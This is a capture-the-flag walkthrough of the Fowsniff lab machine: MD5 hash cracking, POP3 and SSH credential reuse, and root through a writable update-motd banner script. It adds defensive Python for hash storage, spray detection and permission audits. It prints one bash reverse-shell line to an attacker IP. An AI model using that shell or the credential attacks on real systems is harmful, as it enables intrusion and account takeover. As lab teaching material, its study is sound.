Hello, friend. I am back again with another capture-the-flag (CTF) exercise. If you’re new here and curious about CTF exercises, check out my previous post about them here: https://cipherhound.com/blog/enter-the-matrix/. Fowsniff is another vulnerable machine that I downloaded from https://vulnhub.com. It was the first vulnerable machine I’ve tried that incorporated real-world social media into the problem-solving process. Okay, let’s get started.
As usual, I start by monitoring the amount of traffic that I’m sending to the vulnerable machine. Like I said before, I think it’s beneficial to build good habits.
# insert a counting-only rule (no -j target) for outbound TCP to the target
iptables -I OUTPUT -p tcp -d fowsniff.local
# check traffic: -v shows the packet/byte counters, -x prints them unabbreviated
iptables -L OUTPUT -nvx
Now, I’ll check to see if this vulnerable machine has a web server that I can connect to so that I can identify and verify headers and options.
We can see in my “headers” notes that the vulnerable machine is running Ubuntu and Apache 2.4.18. That information may be useful later. We can also see in the “options” screenshot that the server accepts the standard request methods. Navigating to the web server in my favorite browser, we get more useful information: a message detailing the breach of this fictional corporation. If we search for this Twitter handle in a search engine, we find useful information from our hackers. We get a list of the emails used by the corporation and the hashes of their passwords. Furthermore, we get a way to pivot with this new information. According to our hackers, the corporation has a POP3 server that’s wide open.
Before moving on to the POP3 server, we should crack these passwords. According to B1gNinj4, the passwords have been hashed with MD5, an insecure hashing algorithm. Because the hashes are unsalted and MD5 is fast to compute, we can take a list of plaintext words, hash each with MD5, and test whether the results match these known hashes in a dictionary attack.
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt [hashfile]
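To make the point behind the john command concrete from the defender’s side, here is a small added example (my own code for this post, not part of the Fowsniff machine or its tooling). It parses a constructed email:hash dump in the shape the hackers leaked, flags which entries are raw unsalted MD5, shows how a handful of common passwords already expose accounts, and then contrasts that with how the same passwords should have been stored: salted, slowed down with PBKDF2, and compared in constant time. The accounts, hashes and the tiny stand-in wordlist are all made up here; the stored-format string is my own convention, not a standard one.

```python
import hashlib
import hmac
import os
import re

RAW_MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample dump in the "email:hash" shape the post describes.
# The accounts and hashes are made up (built from known weak passwords),
# not the ones from the Fowsniff machine.
SAMPLE_DUMP = "\n".join([
    "alice@example.test:" + hashlib.md5(b"password").hexdigest(),
    "bob@example.test:" + hashlib.md5(b"123456").hexdigest(),
    "carol@example.test:" + hashlib.md5(b"correct-horse-battery").hexdigest(),
])

# A five-word stand-in for rockyou.txt so the example runs offline.
SMALL_WORDLIST = ["letmein", "password", "123456", "qwerty", "iloveyou"]


def parse_dump(text):
    """Return {email: hash} from an email:hash dump, skipping malformed lines."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        email, digest = line.rsplit(":", 1)
        entries[email] = digest.lower()
    return entries


def is_raw_md5(digest):
    """Raw (unsalted) MD5 is 32 hex characters with no salt or algorithm prefix."""
    return bool(RAW_MD5_RE.match(digest))


def exposed_accounts(dump_text, wordlist):
    """Breach-impact check: which raw-MD5 accounts fall to a short wordlist?

    One MD5 per candidate word covers every account at once because there is
    no per-user salt; that is exactly why a leaked MD5 dump is so damaging.
    """
    entries = parse_dump(dump_text)
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {email: lookup[d] for email, d in entries.items()
            if is_raw_md5(d) and d in lookup}


# --- How the store should have looked: salted, slow, constant-time compare ---

def hash_password(password, iterations=600_000):
    """Store as 'pbkdf2_sha256$iterations$salt_hex$digest_hex' (my own layout)."""
    salt = os.urandom(16)                      # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("guessable raw-MD5 accounts:", exposed_accounts(SAMPLE_DUMP, SMALL_WORDLIST))
    a, b = hash_password("password"), hash_password("password")
    print("same password, different stored values:", a != b)
    print("verify correct / wrong:", verify_password("password", a), verify_password("Password", a))
```

Run it and alice and bob fall out immediately, while carol’s passphrase survives the small list; the two PBKDF2 hashes of "password" differ because of the random salt, which is what stops one hash computation from being reused across every account in a dump.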
A POP3 server is an email server that usually allows a client to connect, collect all messages, and delete them from the server. It runs on port 110. Using the previous information, I can verify that the vulnerable machine has an open POP3 server and use the exposed credentials to authenticate to it. Most of the exposed credentials are not useful. There is one, however, that will give you access to very useful emails. I switched to an email client so as to better view the emails.
After reading the emails, we have more information. Now we know that an SSH server is running on the vulnerable machine, we have the password for that account, and we have usernames with which to test it. Just like the credentials for the POP3 server, only one credential is valid for the SSH server.
In order to exploit the information we have discovered, we need to determine which user account (if any) can still be used with the password given in the emails. We can do this with a brute-force script or by testing each one manually.
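Whichever way you test the accounts, the activity leaves a very recognisable trace on the target: a run of sshd “Failed password” lines for several different usernames from one source, followed by an “Accepted” line from the same source. Here is an added example (my own code, not from the machine or its author) that parses constructed Ubuntu-style auth.log lines and flags exactly that pattern. The hostnames, usernames and addresses in the sample are invented; the thresholds are assumptions you would tune for your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd line shapes as written to /var/log/auth.log on Ubuntu (syslog prefix + sshd message).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample log: one source tries four usernames with one password and
# gets in on the fourth; a second source has a single typo followed by a key login.
SAMPLE_AUTH_LOG = """\
Mar 10 10:15:01 srv sshd[1201]: Failed password for invalid user jdoe from 10.0.0.5 port 51234 ssh2
Mar 10 10:15:03 srv sshd[1203]: Failed password for invalid user asmith from 10.0.0.5 port 51236 ssh2
Mar 10 10:15:05 srv sshd[1205]: Failed password for rlee from 10.0.0.5 port 51238 ssh2
Mar 10 10:15:07 srv sshd[1207]: Failed password for mkhan from 10.0.0.5 port 51240 ssh2
Mar 10 10:15:09 srv sshd[1209]: Accepted password for mkhan from 10.0.0.5 port 51242 ssh2
Mar 10 10:20:00 srv sshd[1300]: Failed password for ops from 10.0.0.9 port 40001 ssh2
Mar 10 10:20:30 srv sshd[1302]: Accepted publickey for ops from 10.0.0.9 port 40002 ssh2
"""


def parse_events(text):
    """Return [(timestamp, kind, user, src)] for every failed/accepted sshd line."""
    events = []
    for line in text.splitlines():
        for kind, rx in (("failed", FAILED_RE), ("accepted", ACCEPTED_RE)):
            m = rx.match(line)
            if m:
                ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year
                events.append((ts, kind, m["user"], m["src"]))
                break
    return events


def detect_credential_testing(text, min_failures=3, min_users=2, window_seconds=300):
    """Flag sources with >= min_failures failures against >= min_users distinct
    usernames inside one window, and record a success from that source that
    follows the last failure within the window (the failures-then-success shape).

    Returns {src: {"failed_users": [...], "success_user": str | None}}.
    """
    by_src = defaultdict(list)
    for ev in sorted(parse_events(text)):
        by_src[ev[3]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        fails = [(ts, user) for ts, kind, user, _ in evs if kind == "failed"]
        if len(fails) < min_failures:
            continue
        span = (fails[-1][0] - fails[0][0]).total_seconds()
        users = sorted({u for _, u in fails})
        if span > window_seconds or len(users) < min_users:
            continue
        last_fail = fails[-1][0]
        success = next((user for ts, kind, user, _ in evs
                        if kind == "accepted" and ts >= last_fail
                        and (ts - last_fail).total_seconds() <= window_seconds), None)
        findings[src] = {"failed_users": users, "success_user": success}
    return findings


if __name__ == "__main__":
    for src, info in detect_credential_testing(SAMPLE_AUTH_LOG).items():
        print(f"{src}: tried {info['failed_users']}, then logged in as {info['success_user']}")
```

On the sample, 10.0.0.5 is reported with four usernames and a success as mkhan, while 10.0.0.9 is ignored because a single failure before a key-based login is normal noise. A success that immediately follows a spray from the same address is the alert worth paging on; the failures alone are what fail2ban-style tooling already throttles.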
Now that we have access to an unprivileged account on the target machine, we should identify files that would allow us to escalate our privileges. On Linux, we can do this by searching for files with the setuid bit set that we can manipulate as our current user. I don’t have any luck finding setuid files that would change my status; however, I do find a file in the /opt directory that is writable by my current group.
/bin/bash -i >& /dev/tcp/10.11.1.4/80 0>&1
Opening this file, I noticed that it is actually the banner displayed when logging into the target machine via SSH. Now I know that if I am able to insert a reverse shell into this banner file, I will escalate my privileges to root, because the SSH server runs as the root user. You can see my first attempt at a reverse shell above: I tried to redirect an interactive bash shell over a TCP connection to my attacker machine. After researching which file displays the banner when logging into a server via SSH, I discovered the /etc/update-motd.d/ directory and the 00-header file, and with it the reason my first reverse shell wasn’t effective: I couldn’t change how the banner file was being called.
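The lesson for whoever administers a box like this is that any file root executes at login (the update-motd.d scripts, cron drop-ins, profile.d snippets) must not be writable by an ordinary group or user, and that is a check you can automate. Here is an added audit script (my own code, not part of the machine) that walks a set of directories and reports entries that are group- or world-writable, plus regular files carrying setuid/setgid, which covers both searches in this post. The list of root-executed directories is an assumption for a typical Ubuntu layout; the demo tree it builds under a temporary directory stands in for /etc/update-motd.d, with one deliberately group-writable script.

```python
import os
import stat
import tempfile

# Directories whose contents root runs or sources at login/boot on a typical Ubuntu
# host. Assumed list for this example; extend it to match the host's own layout.
ROOT_EXECUTED_DIRS = ["/etc/update-motd.d", "/etc/cron.d", "/etc/cron.daily", "/etc/profile.d"]


def classify(path):
    """Return a list of risk tags for one filesystem entry (empty when it looks fine)."""
    st = os.lstat(path)
    mode = st.st_mode
    tags = []
    if stat.S_ISLNK(mode):
        return tags                      # judge the link target, which the walk also visits
    if mode & stat.S_IWGRP:
        tags.append("group-writable")
    if mode & stat.S_IWOTH:
        tags.append("world-writable")
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        tags.append("setuid")
    if stat.S_ISREG(mode) and mode & stat.S_ISGID:
        tags.append("setgid")
    return tags


def audit(roots):
    """Walk each root directory; return {path: tags} for every entry with a risk tag.

    A writable directory is reported too: being able to add a script to
    /etc/update-motd.d is as good as being able to edit one.
    """
    findings = {}
    for root in roots:
        if not os.path.isdir(root):
            continue
        if classify(root):
            findings[root] = classify(root)
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                p = os.path.join(dirpath, name)
                try:
                    tags = classify(p)
                except OSError:          # vanished or unreadable entry; skip it
                    continue
                if tags:
                    findings[p] = tags
    return findings


def build_demo_tree():
    """Constructed stand-in for /etc/update-motd.d with one deliberately loose script."""
    base = tempfile.mkdtemp(prefix="motd-audit-")
    os.chmod(base, 0o755)
    paths = {}
    for name, mode in (("00-header", 0o755), ("10-help-text", 0o775), ("50-news", 0o644)):
        p = os.path.join(base, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho banner\n")
        os.chmod(p, mode)                # explicit modes so the demo ignores the umask
        paths[name] = p
    return base, paths


if __name__ == "__main__":
    base, _ = build_demo_tree()
    print("demo tree:", audit([base]))
    print("this host:", audit(ROOT_EXECUTED_DIRS))
```

Run as root across ROOT_EXECUTED_DIRS, the only acceptable output is an empty dictionary; anything group- or world-writable there is the same foothold this post used, and the fix is simply chmod 755 on the script and a look at who owns the group. Run as an unprivileged user, it is the same check the post performed from the other side, which is a good reason to run it yourself first.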
I still needed a way to insert a working reverse shell into this file. I did some research and discovered that Python was installed on the target machine. Using Python, I could create the reverse shell that I needed and escalate my privileges.
After getting a root shell on the target machine, I was able to read the flag in the root directory.
Thanks to berzerk0 for supplying this vulnerable machine on Vulnhub!